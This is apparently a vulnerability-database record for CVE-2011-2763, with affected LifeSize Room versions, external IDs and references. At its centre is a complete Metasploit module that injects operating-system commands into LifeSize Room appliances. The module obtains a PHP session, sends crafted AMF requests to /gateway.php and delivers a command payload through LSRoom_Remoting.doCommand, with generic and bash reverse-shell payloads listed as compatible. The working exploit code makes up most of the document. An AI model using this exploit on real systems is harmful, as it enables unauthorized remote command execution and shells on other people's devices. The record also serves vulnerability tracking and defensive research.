ID
VAR-E-201108-0400
CVE
| cve_id: | CVE-2011-2763 | Trust: 2.4 |
| cve_id: | CVE-2011-2762 | Trust: 0.3 |
EDB ID
17743
TITLE
LifeSize Room - Command Injection (Metasploit) - PHP webapps Exploit
Trust: 0.6
DESCRIPTION
LifeSize Room - Command Injection (Metasploit). CVE-2011-2763CVE-75212 . webapps exploit for PHP platform
Trust: 0.6
AFFECTED PRODUCTS
| vendor: | lifesize | model: | room | scope: | - | version: | - | Trust: 1.0 |
| vendor: | lifesize | model: | room | scope: | eq | version: | 3.5.3/4.7.18 | Trust: 0.5 |
| vendor: | lifesize | model: | communications lifesize room | scope: | eq | version: | 4.7.18 | Trust: 0.3 |
| vendor: | lifesize | model: | communications lifesize room | scope: | eq | version: | 3.5.3 | Trust: 0.3 |
EXPLOIT
require 'msf/core'
class Metasploit3 < Msf::Exploit::Remote
Rank = ExcellentRanking
include Msf::Exploit::Remote::HttpClient
def initialize(info = {})
super(update_info(info,
'Name' => 'LifeSize Room Command Injection',
'Description' => %q{
This module exploits a vulnerable resource in LifeSize
Room versions 3.5.3 and 4.7.18 to inject OS commmands. LifeSize
Room is an appliance and thus the environment is limited
resulting in a small set of payload options.
},
'Author' =>
[
'Spencer McIntyre',
# Special Thanks To Chris Murrey
'SecureState R&D Team'
],
'License' => MSF_LICENSE,
'Version' => '$Revision: 6 $',
'References' =>
[
[ 'CVE', '2011-2763' ],
],
'Privileged' => false,
'Payload' =>
{
'DisableNops' => true,
'Space' => 65535, # limited by the two byte size in the AMF encoding
'Compat' =>
{
'PayloadType' => 'cmd cmd_bash',
'RequiredCmd' => 'generic bash-tcp',
}
},
'Platform' => [ 'unix' ],
'Arch' => ARCH_CMD,
'Targets' => [ [ 'Automatic', { } ] ],
'DisclosureDate' => 'July 13 2011',
'DefaultTarget' => 0))
register_advanced_options(
[
OptString.new('UserAgent', [true, 'The User-Agent header to use for all requests', 'Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.2.17) Gecko/20110428 Fedora/3.6.17-1.fc14 Firefox/3.6.17'])
], self.class)
end
def exploit
print_status("Requesting PHP Session...")
res = send_request_cgi({
'encode' => false,
'uri' => "/interface/interface.php?uniqueKey=#{rand_text_numeric(13)}",
'method' => 'GET',
}, 10)
if not res.headers['set-cookie']
print_error('Could Not Obtain A Session ID')
return
end
sessionid = 'PHPSESSID=' << res.headers['set-cookie'].split('PHPSESSID=')[1].split('; ')[0]
headers = {
'Cookie' => sessionid,
'Content-Type' => 'application/x-amf',
}
print_status("Validating PHP Session...")
res = send_request_cgi({
'encode' => false,
'uri' => '/gateway.php',
'data' => "\x00\x00\x00\x00\x00\x02\x00\x1bLSRoom_Remoting.amfphpLogin\x00\x02/1\x00\x00\x00\x05\x0a\x00\x00\x00\x00\x00\x17LSRoom_Remoting.getHost\x00\x02\x2f\x32\x00\x00\x00\x05\x0a\x00\x00\x00\x00",
'method' => 'POST',
'headers' => headers,
})
if not res
print_error('Could Not Validate The Session ID')
return
end
print_status("Sending Malicious POST Request...")
# This is the amf data for the request to the vulnerable function LSRoom_Remoting.doCommand
amf_data = "\x00\x00\x00\x00\x00\x01\x00\x19LSRoom_Remoting.doCommand\x00\x02\x2f\x37\xff\xff\xff\xff\x0a\x00\x00\x00\x02\x02#{[payload.encoded.length].pack('n')}#{payload.encoded}\x02\x00\x0dupgradeStatus"
res = send_request_cgi({
'encode' => false,
'uri' => '/gateway.php?' << sessionid,
'data' => amf_data,
'method' => 'POST',
'headers' => headers
}, 10)
end
end
Trust: 1.0
EXPLOIT LANGUAGE
rb
Trust: 0.6
PRICE
free
Trust: 0.6
TYPE
Command Injection (Metasploit)
Trust: 1.0
TAGS
| tag: | Metasploit Framework (MSF) | Trust: 1.0 |
| tag: | exploit | Trust: 0.5 |
CREDITS
Spencer McIntyre
Trust: 0.6
EXTERNAL IDS
| db: | NVD | id: | CVE-2011-2763 | Trust: 2.4 |
| db: | EXPLOIT-DB | id: | 17743 | Trust: 1.6 |
| db: | EDBNET | id: | 40276 | Trust: 0.6 |
| db: | PACKETSTORM | id: | 104536 | Trust: 0.5 |
| db: | NVD | id: | CVE-2011-2762 | Trust: 0.3 |
| db: | BID | id: | 49330 | Trust: 0.3 |
REFERENCES
| url: | https://nvd.nist.gov/vuln/detail/cve-2011-2763 | Trust: 2.1 |
| url: | https://www.exploit-db.com/exploits/17743/ | Trust: 0.6 |
| url: | http://www.lifesize.com/products/video/lifesize_room_series/room.aspx | Trust: 0.3 |
SOURCES
| db: | BID | id: | 49330 |
| db: | PACKETSTORM | id: | 104536 |
| db: | EXPLOIT-DB | id: | 17743 |
| db: | EDBNET | id: | 40276 |
LAST UPDATE DATE
2022-07-27T09:25:05.580000+00:00
SOURCES UPDATE DATE
| db: | BID | id: | 49330 | date: | 2011-08-26T00:00:00 |
SOURCES RELEASE DATE
| db: | BID | id: | 49330 | date: | 2011-08-26T00:00:00 |
| db: | PACKETSTORM | id: | 104536 | date: | 2011-08-28T21:18:52 |
| db: | EXPLOIT-DB | id: | 17743 | date: | 2011-08-28T00:00:00 |
| db: | EDBNET | id: | 40276 | date: | 2011-08-28T00:00:00 |